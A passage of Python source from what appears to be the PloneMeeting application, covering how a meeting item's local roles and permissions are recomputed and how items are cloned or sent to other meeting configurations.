apply_meetingmanagers_access, suffix_roles = compute_item_roles_to_assign_to_suffixes(\n cfg, self, item_state, org_uid)\n\n # apply local roles to computed suffixes\n self._assign_roles_to_group_suffixes(org_uid, suffix_roles)\n\n # when more than one group managing item, make sure every groups get access\n org_uids = adapted._getAllGroupsManagingItem(item_state)\n if len(org_uids) > 1:\n adapted._assign_roles_to_all_groups_managing_item_suffixes(\n cfg, item_state, org_uids, org_uid)\n\n # MeetingManagers get access if item at least validated or decided\n # decided will include states \"decided out of meeting\"\n # if it is still not decided, it gets full access\n if apply_meetingmanagers_access:\n mmanagers_item_states = ['validated'] + list(cfg.getItemDecidedStates())\n if item_state in mmanagers_item_states or self.hasMeeting():\n mmanagers_group_id = \"{0}_{1}\".format(cfg.getId(), MEETINGMANAGERS_GROUP_SUFFIX)\n # 'Reviewer' also on decided item, the WF guard will\n # avoid correct if meeting closed, and give 'Contributor' to be\n # able to add decision annexes\n mmanagers_roles = ['Reader', 'Reviewer', 'Contributor']\n if not self.is_decided(cfg, item_state):\n mmanagers_roles += ['Editor']\n self.manage_addLocalRoles(mmanagers_group_id, tuple(mmanagers_roles))\n\n security.declareProtected(ModifyPortalContent, 'update_local_roles')\n\n def update_local_roles(self, reindex=True, avoid_reindex=False, **kwargs):\n '''Updates the local roles of this item, regarding :\n - the proposing group;\n - copyGroups;\n - advices;\n - power observers;\n - budget impact editors;\n - internal notes editors;\n - categorized elements (especially 'visible_for_groups');\n - then call a subscriber 'after local roles updated'.'''\n # remove every localRoles then recompute\n old_local_roles = _clear_local_roles(self)\n\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n item_state = self.query_state()\n # local_roles related indexes\n related_indexes = ['getCopyGroups', 'getGroupsInCharge']\n\n # update suffixes related local roles\n self.assign_roles_to_group_suffixes(cfg, item_state)\n\n # update local roles regarding copyGroups\n isCreated = kwargs.get('isCreated', None)\n self._updateCopyGroupsLocalRoles(isCreated, cfg, item_state)\n # Update advices after update_local_roles because it\n # reinitialize existing local roles\n triggered_by_transition = kwargs.get('triggered_by_transition', None)\n invalidate = kwargs.get('invalidate', False)\n inheritedAdviserUids = kwargs.get('inheritedAdviserUids', [])\n # reindex \"indexAdvisers\" if adviceIndex changed\n related_indexes += self._updateAdvices(\n cfg,\n item_state,\n invalidate=invalidate,\n triggered_by_transition=triggered_by_transition,\n inheritedAdviserUids=inheritedAdviserUids)\n # Update every 'power observers' local roles given to the\n # corresponding MeetingConfig.powerObsevers\n # it is done on every edit because of 'item_access_on' TAL expression\n self._updatePowerObserversLocalRoles(cfg, item_state)\n # update budget impact editors local roles\n self._updateBudgetImpactEditorsLocalRoles(cfg, item_state)\n # update internal notes editors local roles\n self._updateInternalNotesEditorsLocalRoles(cfg, item_state)\n # update committees editors local roles\n self._updateCommitteeEditorsLocalRoles(cfg, item_state)\n # update group in charge local roles\n # we will give the current groupsInCharge _observers sub group access to this item\n self._updateGroupsInChargeLocalRoles(cfg, item_state)\n # manage automatically given permissions\n _addManagedPermissions(self)\n # clean borg.localroles caching\n cleanMemoize(self, prefixes=['borg.localrole.workspace.checkLocalRolesAllowed'])\n # notify that localRoles have been updated\n notify(ItemLocalRolesUpdatedEvent(self, old_local_roles))\n # update annexes categorized_elements to store 'visible_for_groups'\n # do it only if local_roles changed\n # do not do it when isCreated, this is only possible when item duplicated\n # in this case, annexes are correct\n if not isCreated and old_local_roles != self.__ac_local_roles__:\n updateAnnexesAccess(self)\n # update categorized elements on contained advices too\n for advice in self.getAdvices():\n updateAnnexesAccess(advice)\n # propagate Reader local_roles to sub elements\n # this way for example users that have Reader role on item may view the advices\n self._propagateReaderAndMeetingManagerLocalRolesToSubObjects(cfg)\n # reindex object security except if avoid_reindex=True and localroles are the same\n # or if we are here after transition as WorkflowTool._reindexWorkflowVariables\n # will reindexObjectSecurity\n if not avoid_reindex or old_local_roles != self.__ac_local_roles__:\n # triggering transition will reindexObjectSecurity\n if not triggered_by_transition:\n self.reindexObjectSecurity()\n if reindex:\n self.reindexObject(idxs=related_indexes)\n return related_indexes\n\n def _propagateReaderAndMeetingManagerLocalRolesToSubObjects(self, cfg):\n \"\"\"Propagate the 'Reader' and 'MeetingManager' local roles to\n sub objects that are blocking local roles inheritance.\"\"\"\n objs = [obj for obj in self.objectValues()\n if getattr(obj, '__ac_local_roles_block__', False)]\n if objs:\n grp_reader_localroles = [\n grp_id for grp_id in self.__ac_local_roles__\n if 'Reader' in self.__ac_local_roles__[grp_id]]\n meetingmanager_group_id = get_plone_group_id(cfg.getId(), MEETINGMANAGERS_GROUP_SUFFIX)\n for obj in objs:\n # clear local roles then recompute\n # only Reader local roles are set, the Editor/Contributor\n # local roles are set by borg.localroles\n _clear_local_roles(obj)\n for grp_id in grp_reader_localroles:\n obj.manage_addLocalRoles(grp_id, ['Reader'])\n obj.manage_addLocalRoles(meetingmanager_group_id, ['MeetingManager'])\n\n def _updateCopyGroupsLocalRoles(self, isCreated, cfg, item_state):\n '''Give the 'Reader' local role to the copy groups\n depending on what is defined in the corresponding meetingConfig.'''\n if not self.attribute_is_used('copyGroups'):\n return\n # Check if some copyGroups must be automatically added\n self.addAutoCopyGroups(isCreated=isCreated)\n\n # check if copyGroups should have access to this item for current review state\n if item_state not in cfg.getItemCopyGroupsStates():\n return\n # Add the local roles corresponding to the selected copyGroups.\n # We give the 'Reader' role to the selected groups.\n # This will give them a read-only access to the item.\n copyGroupIds = self.getAllCopyGroups(auto_real_plone_group_ids=True)\n for copyGroupId in copyGroupIds:\n self.manage_addLocalRoles(copyGroupId, (READER_USECASES['copy_groups'],))\n\n def _updatePowerObserversLocalRoles(self, cfg, item_state):\n '''Give local roles to the groups defined in MeetingConfig.powerObservers.'''\n extra_expr_ctx = _base_extra_expr_ctx(self)\n extra_expr_ctx.update({'item': self, })\n cfg_id = cfg.getId()\n for po_infos in cfg.getPowerObservers():\n if item_state in po_infos['item_states'] and \\\n _evaluateExpression(self,\n expression=po_infos['item_access_on'],\n extra_expr_ctx=extra_expr_ctx):\n powerObserversGroupId = \"%s_%s\" % (cfg_id, po_infos['row_id'])\n self.manage_addLocalRoles(powerObserversGroupId,\n (READER_USECASES['powerobservers'],))\n\n def _updateBudgetImpactEditorsLocalRoles(self, cfg, item_state):\n '''Configure local role for use case 'budget_impact_reviewers' to the corresponding\n MeetingConfig 'budgetimpacteditors' group.'''\n if item_state not in cfg.getItemBudgetInfosStates():\n return\n budgetImpactEditorsGroupId = \"%s_%s\" % (cfg.getId(), BUDGETIMPACTEDITORS_GROUP_SUFFIX)\n self.manage_addLocalRoles(budgetImpactEditorsGroupId, ('MeetingBudgetImpactEditor',))\n\n def _updateInternalNotesEditorsLocalRoles(self, cfg, item_state):\n '''Add local roles depending on MeetingConfig.\n We use the IIconifiedInfos adapter that computes groups to give local roles to.'''\n if not self.attribute_is_used('internalNotes'):\n return\n # as computing groups for internal notes is the same as computing groups\n # for access to confidential annexes, we use the code in the IIconifiedInfos adapter\n adapter = getAdapter(self, IIconifiedInfos)\n adapter.parent = self\n group_ids = adapter._item_visible_for_groups(\n adapter.cfg.getItemInternalNotesEditableBy())\n for group_id in group_ids:\n self.manage_addLocalRoles(group_id, ('MeetingInternalNotesEditor',))\n\n def _updateCommitteeEditorsLocalRoles(self, cfg, item_state):\n '''Add local roles depending on MeetingConfig.committees.'''\n if item_state in cfg.getItemCommitteesStates():\n local_roles = (\"MeetingCommitteeEditor\", \"Reader\")\n elif item_state in cfg.getItemCommitteesViewStates():\n local_roles = (\"Reader\", )\n else:\n return\n cfg_id = cfg.getId()\n for committee_id in self.getCommittees():\n if committee_id != NO_COMMITTEE and \\\n cfg.getCommittees(committee_id=committee_id)['enable_editors'] == \"1\":\n self.manage_addLocalRoles(\n get_plone_group_id(cfg_id, committee_id), local_roles)\n\n def _updateGroupsInChargeLocalRoles(self, cfg, item_state):\n '''Get the current groupsInCharge and give View access to the _observers Plone group.'''\n if item_state not in cfg.getItemGroupsInChargeStates():\n return\n groupsInChargeUids = self.getGroupsInCharge(theObjects=False, includeAuto=True)\n for groupInChargeUid in groupsInChargeUids:\n observersPloneGroupId = get_plone_group_id(groupInChargeUid, 'observers')\n self.manage_addLocalRoles(observersPloneGroupId, (READER_USECASES['groupsincharge'],))\n\n def _historizeAdvicesOnItemEdit(self):\n \"\"\"When item is edited, historize advices if necessary, it is the case if advice was\n really given and is not hidden during redaction.\"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if cfg.getHistorizeAdviceIfGivenAndItemModified():\n for advice_id, adviceInfo in self.adviceIndex.items():\n if not self._advice_is_given(advice_id):\n continue\n adviceObj = self.get(adviceInfo['advice_id'])\n adviceObj.historize_if_relevant(comment='Historized because item was edited.')\n\n def _advice_is_given(self, advice_id):\n \"\"\"Return True if advice is not given.\"\"\"\n is_given = True\n advice_info = self.adviceIndex.get(advice_id, {})\n if not advice_info or \\\n advice_info['type'] in (NOT_GIVEN_ADVICE_VALUE, 'asked_again') or \\\n advice_info['hidden_during_redaction']:\n is_given = False\n return is_given\n\n security.declareProtected(ModifyPortalContent, 'initializeArchetype')\n\n def initializeArchetype(self, **kwargs):\n '''Override to call item_added_or_initialized to make plone.restapi happy.'''\n item_added_or_initialized(self)\n return BaseFolder.initializeArchetype(self, **kwargs)\n\n security.declareProtected(ModifyPortalContent, 'processForm')\n\n def processForm(self, data=1, metadata=0, REQUEST=None, values=None):\n ''' '''\n if not self.isTemporary():\n # Remember previous data if historization is enabled.\n self._v_previousData = rememberPreviousData(self)\n # Historize advice that were still not, this way we ensure that\n # given advices are historized with right item data\n if hasattr(self, 'adviceIndex'):\n self._historizeAdvicesOnItemEdit()\n # unmark deferred SearchableText reindexing\n setattr(self, REINDEX_NEEDED_MARKER, False)\n return BaseFolder.processForm(\n self, data=data, metadata=metadata, REQUEST=REQUEST, values=values)\n\n security.declarePublic('showOptionalAdvisers')\n\n def showOptionalAdvisers(self):\n '''Show 'MeetingItem.optionalAdvisers' if the \"advices\" functionality\n is enabled and if there are selectable optional advices.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = False\n if cfg.getUseAdvices():\n vocab = self.getField('optionalAdvisers').Vocabulary(self)\n res = bool(vocab)\n return res\n\n security.declarePublic('isVotesEnabled')\n\n def isVotesEnabled(self):\n '''Returns True if the votes are enabled.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n return cfg.getUseVotes()\n\n security.declarePublic('getSiblingItem')\n\n def getSiblingItem(self, whichItem, itemNumber=True):\n '''If this item is within a meeting, this method returns the itemNumber of\n a sibling item that may be accessed by the current user. p_whichItem\n can be:\n - 'all' (return every possible ways here under);\n - 'previous' (the previous item within the meeting);\n - 'next' (the next item item within the meeting);\n - 'first' (the first item of the meeting);\n - 'last' (the last item of the meeting).\n If there is no sibling (or if it has no sense to ask for this\n sibling), the method returns None.\n If p_itemNumber is True (default), we return the getItemNumber.\n '''\n sibling = {'first': None, 'last': None, 'next': None, 'previous': None}\n if self.hasMeeting():\n meeting = self.getMeeting()\n # use catalog query so returned items are really accessible by current user\n brains = meeting.get_items(ordered=True, the_objects=False)\n itemUids = [brain.UID for brain in brains]\n itemUid = self.UID()\n itemUidIndex = itemUids.index(itemUid)\n if whichItem == 'previous' or whichItem == 'all':\n # Is a previous item available ?\n if not itemUidIndex == 0:\n sibling['previous'] = brains[itemUidIndex - 1]\n if whichItem == 'next' or whichItem == 'all':\n # Is a next item available ?\n if not itemUidIndex == len(itemUids) - 1:\n sibling['next'] = brains[itemUidIndex + 1]\n if whichItem == 'first' or whichItem == 'all':\n sibling['first'] = brains[0]\n if whichItem == 'last' or whichItem == 'all':\n sibling['last'] = brains[-1]\n if sibling and itemNumber:\n # turn value (brain) into item number value (like 800)\n sibling = {key: value and value._unrestrictedGetObject().getItemNumber() or None\n for key, value in sibling.items()}\n return sibling.get(whichItem, sibling)\n\n security.declarePublic('showDuplicateItemAction')\n\n def showDuplicateItemAction(self):\n '''Condition for displaying the 'duplicate' action in the interface.\n Returns True if the user can duplicate the item.'''\n # Conditions for being able to see the \"duplicate an item\" action:\n # - the functionnality is enabled in MeetingConfig;\n # - the item is not added in the configuration;\n # - the user is creator in some group;\n # - the user must be able to see the item if it is secret.\n # The user will duplicate the item in his own folder.\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if not cfg.getEnableItemDuplication() or \\\n self.isDefinedInTool() or \\\n not tool.userIsAmong(['creators'], cfg=cfg) or \\\n not self.adapted().isPrivacyViewable():\n return False\n return True\n\n def _mayClone(self, cloneEventAction=None):\n \"\"\" \"\"\"\n # first check that we are not trying to clone an item\n # we can not access because of privacy status\n # do this check if we are not creating an item from an itemTemplate\n # because if a proposingGroup is defined, it will not be\n # privacyViewable and using such an item template will always fail...\n if not self.isDefinedInTool() and not self.adapted().isPrivacyViewable():\n raise Unauthorized\n\n # 'duplicate' and 'duplicate and keep link'\n if cloneEventAction in (DUPLICATE_EVENT_ACTION, DUPLICATE_AND_KEEP_LINK_EVENT_ACTION) and \\\n not self.showDuplicateItemAction():\n raise Unauthorized\n\n security.declarePrivate('clone')\n\n def clone(self, copyAnnexes=True, copyDecisionAnnexes=False, newOwnerId=None,\n cloneEventAction=None, cloneEventActionLabel=None, destFolder=None,\n copyFields=DEFAULT_COPIED_FIELDS, newPortalType=None, keepProposingGroup=False,\n setCurrentAsPredecessor=False, manualLinkToPredecessor=False,\n inheritAdvices=False, inheritedAdviceUids=[], keep_ftw_labels=False,\n keptAnnexIds=[], keptDecisionAnnexIds=[], item_attrs={}, reindexNewItem=True):\n '''Clones me in the PloneMeetingFolder of the current user, or\n p_newOwnerId if given (this guy will also become owner of this\n item). If there is a p_cloneEventAction, an event will be included\n in the cloned item's history, indicating that is was created from\n another item (useful for delayed items, but not when simply\n duplicating an item). p_copyFields will contains a list of fields\n we want to keep value of, if not in this list, the new field value\n will be the default value for this field.\n If p_keepProposingGroup, the proposingGroup in ToolPloneMeeting.pasteItem\n no matter current user is not member of that group.\n If p_setCurrentAsPredecessor, current item will be set as predecessor\n for the new item, concomitantly if p_manualLinkToPredecessor is True and\n optional field MeetingItem.manuallyLinkedItems is enabled, this will create\n a manualLink to the predecessor, otherwise, the linked_predecessor_uid is used\n and the link is unbreakable (at least thru the UI).\n If p_inheritAdvices is True, advices will be inherited from predecessor,\n this also needs p_setCurrentAsPredecessor=True and p_manualLinkToPredecessor=False.\n When p_copyAnnexes=True, we may give a p_keptAnnexIds, if so, only annexes\n with those ids are kept, if not, every annexes are kept.\n Same for p_copyDecisionAnnexes/p_keptDecisionAnnexIds.\n The given p_item_attrs will be arbitrary set on new item before it is reindexed.'''\n\n # check if may clone\n self._mayClone(cloneEventAction)\n\n # Get the PloneMeetingFolder of the current user as destFolder\n tool = api.portal.get_tool('portal_plonemeeting')\n userId = get_current_user_id(self.REQUEST)\n # make sure the newOwnerId exist (for example a user created an item, the\n # user was deleted and we are now cloning his item)\n if newOwnerId and not api.user.get(userid=newOwnerId):\n newOwnerId = userId\n # Do not use \"not destFolder\" because destFolder is an ATBTreeFolder\n # and an empty ATBTreeFolder will return False while testing destFolder.\n cfg = tool.getMeetingConfig(self)\n if destFolder is None:\n destFolder = tool.getPloneMeetingFolder(cfg.getId(), newOwnerId)\n # if we are cloning to the same mc, keep some more fields\n same_mc_types = (None,\n cfg.getItemTypeName(),\n cfg.getItemTypeName('MeetingItemTemplate'),\n cfg.getItemTypeName('MeetingItemRecurring'))\n cloned_to_same_mc = newPortalType in same_mc_types\n if cloned_to_same_mc:\n copyFields = copyFields + EXTRA_COPIED_FIELDS_SAME_MC\n cloned_from_item_template = self.portal_type == cfg.getItemTypeName('MeetingItemTemplate')\n if cloned_from_item_template:\n copyFields = copyFields + EXTRA_COPIED_FIELDS_FROM_ITEM_TEMPLATE\n # Check if an external plugin want to add some copyFields\n copyFields = copyFields + self.adapted().getExtraFieldsToCopyWhenCloning(\n cloned_to_same_mc, cloned_from_item_template)\n\n # clone\n # Copy/paste item into the folder, change portal_type on source\n # so it is correct in copiedData and may be used in events\n original_portal_type = self.portal_type\n self.portal_type = newPortalType or original_portal_type\n copiedData = self.aq_inner.aq_parent.manage_copyObjects(ids=[self.id])\n newItem = tool.pasteItem(destFolder,\n copiedData,\n copyAnnexes=copyAnnexes,\n copyDecisionAnnexes=copyDecisionAnnexes,\n newOwnerId=newOwnerId, copyFields=copyFields,\n newPortalType=newPortalType,\n keepProposingGroup=keepProposingGroup,\n keep_ftw_labels=keep_ftw_labels,\n keptAnnexIds=keptAnnexIds,\n keptDecisionAnnexIds=keptDecisionAnnexIds)\n self.portal_type = original_portal_type\n\n # special handling for some fields kept when cloned_to_same_mc\n # we check that used values on original item are still useable for cloned item\n # in case configuration changed since original item was created\n dest_cfg = tool.getMeetingConfig(newItem)\n if 'otherMeetingConfigsClonableTo' in copyFields:\n clonableTo = set([mc['meeting_config'] for mc in dest_cfg.getMeetingConfigsToCloneTo()])\n # make sure we only have selectable otherMeetingConfigsClonableTo\n newItem.setOtherMeetingConfigsClonableTo(\n tuple(set(self.getOtherMeetingConfigsClonableTo()).intersection(clonableTo)))\n if 'copyGroups' in copyFields:\n copyGroups = list(self.getCopyGroups())\n selectableCopyGroups = 'copyGroups' in dest_cfg.getUsedItemAttributes() and \\\n dest_cfg.getSelectableCopyGroups() or []\n # make sure we only have selectable copyGroups\n newItem.setCopyGroups(\n tuple(set(copyGroups).intersection(set(selectableCopyGroups))))\n if 'optionalAdvisers' in copyFields:\n optionalAdvisers = list(newItem.getOptionalAdvisers())\n advisers_vocab = get_vocab(\n newItem,\n newItem.getField('optionalAdvisers').vocabulary_factory,\n **{'include_selected': False, 'include_not_selectable_values': False})\n selectableAdvisers = advisers_vocab.by_token\n # make sure we only have selectable advisers\n newItem.setOptionalAdvisers(\n tuple(set(optionalAdvisers).intersection(set(selectableAdvisers))))\n\n # automatically set current item as predecessor for newItem?\n inheritedAdviserUids = []\n if setCurrentAsPredecessor:\n if manualLinkToPredecessor:\n newItem.setManuallyLinkedItems([self.UID()])\n else:\n newItem._update_predecessor(self)\n # manage inherited adviceIds\n if inheritAdvices:\n inheritedAdviserUids = [org_uid for org_uid in self.adviceIndex.keys()\n if (not inheritedAdviceUids or org_uid in inheritedAdviceUids) and\n newItem.couldInheritAdvice(org_uid)]\n\n # set arbitrary attrs before reindexing\n for attr_id, attr_value in item_attrs.items():\n field = newItem.getField(attr_id)\n field.getMutator(newItem)(attr_value)\n\n if cloneEventAction:\n # We are sure that there is only one key in the workflow_history\n # because it was cleaned by ToolPloneMeeting.pasteItem\n # use cloneEventActionLabel or generate a msgid based on cloneEventAction\n action_label = cloneEventActionLabel or cloneEventAction + '_comments'\n add_wf_history_action(newItem,\n action_name=cloneEventAction,\n action_label=action_label,\n user_id=userId)\n\n newItem.at_post_create_script(inheritedAdviserUids=inheritedAdviserUids)\n\n # notify that item has been duplicated so subproducts may interact if necessary\n notify(ItemDuplicatedEvent(self, newItem))\n\n # while self.reindexObject() is called without indexes\n # a notifyModified is done, do it also or the modified of cloned item is not updated\n newItem.notifyModified()\n # cloned item is originally reindexed but as we changed things after we reindex here\n # regarding everything that may have changed, including things done in the ItemDuplicatedEvent\n # excepted heavy indexes, so ZCTextIndexes\n if reindexNewItem:\n reindex_object(newItem, no_idxs=['SearchableText', 'Title', 'Description'])\n\n # add logging message to fingerpointing log\n extras = 'object={0} clone_event={1}'.format(\n repr(newItem), cloneEventAction)\n fplog('clone_item', extras=extras)\n return newItem\n\n def get_enable_clone_to_other_mc_fields(self, cfg, ignored_field_names=[]):\n \"\"\"Return the ids of 'otherMeetingConfigsClonableToFieldXXX' that are enabled.\"\"\"\n return [field_name for field_name in self.Schema().keys()\n if field_name in cfg.getUsedItemAttributes() and\n field_name.startswith('otherMeetingConfigsClonableToField') and\n field_name not in ignored_field_names]\n\n security.declarePublic('doCloneToOtherMeetingConfig')\n\n def doCloneToOtherMeetingConfig(self, destMeetingConfigId):\n '''Action used by the 'clone to other config' button.'''\n self.cloneToOtherMeetingConfig(destMeetingConfigId)\n\n def _otherMCMeetingToBePresentedIn(self, destMeetingConfig):\n \"\"\"Returns the logical meeting the item should be presented in\n when it will be sent to given p_destMeetingConfig.\"\"\"\n if destMeetingConfig.getId() in self.getOtherMeetingConfigsClonableToEmergency():\n meetingsAcceptingItems = destMeetingConfig.getMeetingsAcceptingItems(\n inTheFuture=True)\n else:\n wfTool = api.portal.get_tool('portal_workflow')\n meetingWF = wfTool.getWorkflowsFor(destMeetingConfig.getMeetingTypeName())[0]\n meetingsAcceptingItems = destMeetingConfig.getMeetingsAcceptingItems(\n review_states=(wfTool[meetingWF.getId()].initial_state, ),\n inTheFuture=True)\n res = None\n if meetingsAcceptingItems:\n res = meetingsAcceptingItems[0]._unrestrictedGetObject()\n return res\n\n security.declarePrivate('cloneToOtherMeetingConfig')\n\n def cloneToOtherMeetingConfig(self, destMeetingConfigId, automatically=False):\n '''Sends this meetingItem to another meetingConfig whose id is\n p_destMeetingConfigId.\n If p_automatically is True it means that we are sending the item\n using the automatic way, either it means we are sending it manually.\n If defined in the configuration, different transitions will be triggered on\n the cloned item if p_automatically is True.\n In any case, a link to the source item is made.'''\n if not self.adapted().mayCloneToOtherMeetingConfig(destMeetingConfigId, automatically):\n # If the user came here, he even does not deserve a clear message ;-)\n raise Unauthorized\n\n wfTool = api.portal.get_tool('portal_workflow')\n tool = api.portal.get_tool('portal_plonemeeting')\n plone_utils = api.portal.get_tool('plone_utils')\n destMeetingConfig = getattr(tool, destMeetingConfigId, None)\n cfg = tool.getMeetingConfig(self)\n\n # This will get the destFolder or create it if the current user has the permission\n # if not, then we return a message\n try:\n destFolder = tool.getPloneMeetingFolder(destMeetingConfigId,\n self.Creator())\n except ValueError:\n # While getting the destFolder, it could not exist, in this case\n # we return a clear message\n plone_utils.addPortalMessage(translate('sendto_inexistent_destfolder_error',\n mapping={'meetingConfigTitle': destMeetingConfig.Title()},\n domain=\"PloneMeeting\", context=self.REQUEST),\n type='error')\n return\n # The owner of the new item will be the same as the owner of the\n # original item.\n newOwnerId = self.Creator()\n cloneEventAction = 'create_to_%s_from_%s' % (destMeetingConfigId,\n cfg.getId())\n fieldsToCopy = list(DEFAULT_COPIED_FIELDS)\n destUsedItemAttributes = destMeetingConfig.getUsedItemAttributes()\n # do not keep optional fields that are not used in the destMeetingConfig\n optionalFields = cfg.listUsedItemAttributes().keys()\n # iterate a copy of fieldsToCopy as we change it in the loop\n for field in list(fieldsToCopy):\n if field in optionalFields and field not in destUsedItemAttributes:\n # special case for 'groupsInCharge' that works alone or\n # together with 'proposingGroupWithGroupInCharge'\n if field == 'groupsInCharge' and \\\n 'proposingGroupWithGroupInCharge' in destUsedItemAttributes:\n continue\n fieldsToCopy.remove(field)\n # special case for 'budgetRelated' that works together with 'budgetInfos'\n if field == 'budgetInfos':\n fieldsToCopy.remove('budgetRelated')\n\n contentsKeptOnSentToOtherMC = cfg.getContentsKeptOnSentToOtherMC()\n keepAdvices = 'advices' in contentsKeptOnSentToOtherMC\n keptAdvices = keepAdvices and cfg.getAdvicesKeptOnSentToOtherMC(as_org_uids=True, item=self) or []\n copyAnnexes = 'annexes' in contentsKeptOnSentToOtherMC\n copyDecisionAnnexes = 'decision_annexes' in contentsKeptOnSentToOtherMC\n newItem = self.clone(copyAnnexes=copyAnnexes,\n copyDecisionAnnexes=copyDecisionAnnexes,\n newOwnerId=newOwnerId,\n cloneEventAction=cloneEventAction,\n destFolder=destFolder, copyFields=fieldsToCopy,\n newPortalType=destMeetingConfig.getItemTypeName(),\n keepProposingGroup=True, setCurrentAsPredecessor=True,\n inheritAdvices=keepAdvices, inheritedAdviceUids=keptAdvices,\n reindexNewItem=False)\n # manage categories mapping, if original and new items use\n # categories, we check if a mapping is defined in the configuration of the original item\n originalCategory = self.getCategory(theObject=True)\n if originalCategory and \"category\" in destUsedItemAttributes:\n # find out if something is defined when sending an item to destMeetingConfig\n for destCat in originalCategory.category_mapping_when_cloning_to_other_mc:\n if destCat.split('.')[0] == destMeetingConfigId:\n # we found a mapping defined for the new category, apply it\n # get the category so it fails if it does not exist (that should not be possible...)\n newCat = getattr(destMeetingConfig.categories, destCat.split('.')[1])\n newItem.setCategory(newCat.getId())\n break\n\n # find meeting to present the item in and set it as preferred\n # this way if newItem needs to be presented in a frozen meeting, it works\n # as it requires the preferredMeeting to be the frozen meeting\n meeting = self._otherMCMeetingToBePresentedIn(destMeetingConfig)\n if meeting:\n newItem.setPreferredMeeting(meeting.UID())\n # handle 'otherMeetingConfigsClonableToPrivacy' of original item\n if destMeetingConfigId in self.getOtherMeetingConfigsClonableToPrivacy() and \\\n 'privacy' in destUsedItemAttributes:\n newItem.setPrivacy('secret')\n\n # handle 'otherMeetingConfigsClonableToFieldXXX' of original item\n for other_mc_field_name in self.get_enable_clone_to_other_mc_fields(cfg):\n # first check if original field not empty\n if self.fieldIsEmpty(other_mc_field_name):\n continue\n other_mc_field = self.getField(other_mc_field_name)\n other_mc_field_value = other_mc_field.get(self)\n dest_field_name = other_mc_field_name.replace('otherMeetingConfigsClonableToField', '')\n dest_field_name = dest_field_name[0].lower() + dest_field_name[1:]\n dest_field = newItem.getField(dest_field_name)\n dest_field.set(newItem, other_mc_field_value)\n\n # execute some transitions on the newItem if it was defined in the cfg\n # find the transitions to trigger\n triggerUntil = NO_TRIGGER_WF_TRANSITION_UNTIL\n for mctct in cfg.getMeetingConfigsToCloneTo():\n if mctct['meeting_config'] == destMeetingConfigId:\n triggerUntil = mctct['trigger_workflow_transitions_until']\n # if transitions to trigger, trigger them!\n # this is only done when item is cloned automatically or current user isManager\n if not triggerUntil == NO_TRIGGER_WF_TRANSITION_UNTIL and \\\n (automatically or tool.isManager(cfg)):\n # triggerUntil is like meeting-config-xxx.validate, get the real transition\n triggerUntil = triggerUntil.split('.')[1]\n wf_comment = translate('transition_auto_triggered_item_sent_to_this_config',\n domain='PloneMeeting',\n context=self.REQUEST)\n # save original published object in case we are presenting\n # several items in a meeting and some are sent to another MC then presented\n # to a meeting of this other MB\n originalPublishedObject = self.REQUEST.get('PUBLISHED')\n # do this as Manager to be sure that transitions may be triggered\n with api.env.adopt_roles(roles=['Manager']):\n destCfgTitle = safe_unicode(destMeetingConfig.Title())\n # we will warn user if some transitions may not be triggered and\n # triggerUntil is not reached\n need_to_warn = True\n # try to bypass by using the \"validate\" shortcut\n if triggerUntil in [\"validate\", \"present\"] and \\\n \"validate\" in get_transitions(newItem):\n wfTool.doActionFor(newItem, \"validate\")\n for tr in destMeetingConfig.getTransitionsForPresentingAnItem(\n org_uid=newItem.getProposingGroup()):\n # special handling for the 'present' transition\n # that needs a meeting as 'PUBLISHED' object to work\n if tr == 'present' and \\\n not isinstance(newItem.wfConditions()._check_required_data(\"presented\"), No):\n if not meeting:\n plone_utils.addPortalMessage(\n _('could_not_present_item_no_meeting_accepting_items',\n mapping={'destMeetingConfigTitle': destCfgTitle}),\n 'warning')\n # avoid double warning message\n need_to_warn = False\n break\n newItem.REQUEST['PUBLISHED'] = meeting\n # trigger transition if available\n was_triggered = False\n if tr in get_transitions(newItem):\n wfTool.doActionFor(newItem, tr, comment=wf_comment)\n was_triggered = True\n # if we reach the triggerUntil transition, stop\n if tr == triggerUntil:\n if was_triggered:\n need_to_warn = False\n break\n # warn if triggerUntil was not reached\n if need_to_warn:\n plone_utils.addPortalMessage(\n translate('could_not_trigger_transition_for_cloned_item',\n mapping={'meetingConfigTitle': destCfgTitle},\n domain=\"PloneMeeting\",\n context=self.REQUEST),\n type='warning')\n # set back originally PUBLISHED object\n self.REQUEST.set('PUBLISHED', originalPublishedObject)\n\n # Save that the element has been cloned to another meetingConfig\n annotation_key = self._getSentToOtherMCAnnotationKey(destMeetingConfigId)\n ann = IAnnotations(self)\n ann[annotation_key] = newItem.UID()\n\n # When an item is duplicated, if it was sent from a MeetingConfig to\n # another, we will add a line in the original item history specifying that\n # it was sent to another meetingConfig. The 'new item' already have\n # a line added to his workflow_history.\n # add a line to the original item history\n action_label = translate(\n 'sentto_othermeetingconfig',\n domain=\"PloneMeeting\",\n context=self.REQUEST,\n mapping={'meetingConfigTitle': safe_unicode(destMeetingConfig.Title())})\n action_name = destMeetingConfig._getCloneToOtherMCActionTitle(destMeetingConfig.Title())\n # add an event to the workflow history\n add_wf_history_action(self, action_name=action_name, action_label=action_label)\n\n # Send an email to the user being able to modify the new item if relevant\n mapping = {'originMeetingConfigTitle': safe_unicode(cfg.Title()), }\n sendMailIfRelevant(newItem,\n 'itemClonedToThisMC',\n ModifyPortalContent,\n mapping=mapping,\n isPermission=True)\n plone_utils.addPortalMessage(\n translate('sendto_success',\n mapping={'cfgTitle': safe_unicode(destMeetingConfig.Title())},\n domain=\"PloneMeeting\",\n context=self.REQUEST),\n type='info')\n\n # notify that item has been duplicated to another meetingConfig\n # so subproducts may interact if necessary\n notify(ItemDuplicatedToOtherMCEvent(self, newItem))\n\n # reindex, everything but ZCTextIndexes for newItem\n # and 'sentToInfos' for self\n # reindex after call to ItemDuplicatedToOtherMCEvent so we avoid double reindex\n reindex_object(newItem, no_idxs=['SearchableText', 'Title', 'Description'])\n reindex_object(self, idxs=['sentToInfos'], update_metadata=False)\n\n return newItem\n\n def _getSentToOtherMCAnnotationKey(self, destMeetingConfigId):\n '''Returns the annotation key where we store the UID of the item we\n cloned to another meetingConfigFolder.'''\n return SENT_TO_OTHER_MC_ANNOTATION_BASE_KEY + destMeetingConfigId\n\n security.declarePublic('mayCloneToOtherMeetingConfig')\n\n def 